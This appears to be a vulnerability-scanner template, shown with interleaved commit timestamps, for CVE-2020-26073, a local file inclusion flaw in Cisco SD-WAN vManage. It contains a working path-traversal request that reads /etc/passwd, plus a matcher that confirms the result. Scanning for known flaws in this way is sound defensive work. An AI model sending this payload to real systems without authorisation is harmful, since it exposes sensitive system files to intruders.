2021-03-11 10:37:37 +00:00
id : CVE-2020-26073
2022-04-22 10:38:41 +00:00
2021-02-17 19:37:37 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Cisco SD-WAN vManage Software - Local File Inclusion
2021-02-17 19:37:37 +00:00
author : madrobot
severity : high
2021-03-15 17:27:01 +00:00
description : |
2022-07-26 13:45:11 +00:00
Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can exploit this vulnerability to read sensitive files on the affected system.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the latest security patches provided by Cisco to fix the vulnerability.
2021-03-15 18:22:42 +00:00
reference :
2021-03-15 17:27:01 +00:00
- https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
2022-07-26 13:45:11 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073
2022-04-01 08:51:42 +00:00
classification :
cve-id : CVE-2020-26073
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-08-31 11:46:18 +00:00
tags : cve,cve2020,cisco,lfi
2021-02-17 19:37:37 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-17 19:37:37 +00:00
- method : GET
path :
- "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
2023-08-31 11:46:18 +00:00
2021-02-17 19:37:37 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
2023-08-31 11:46:18 +00:00
2021-02-17 19:37:37 +00:00
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-02-17 19:37:37 +00:00
part : body
2023-12-29 09:30:44 +00:00
# digest: 4a0a00473045022039766848e039513d1de75fa4526a5cd9bd3ee54b8e0204e824e5e3f2a4abd8340221008795b9f415bd03ded961e86016a7a3f2d3546ccc02c4aa1b9afaf7550bb1adbc:922c64590222798bb761d5b6d8e72950
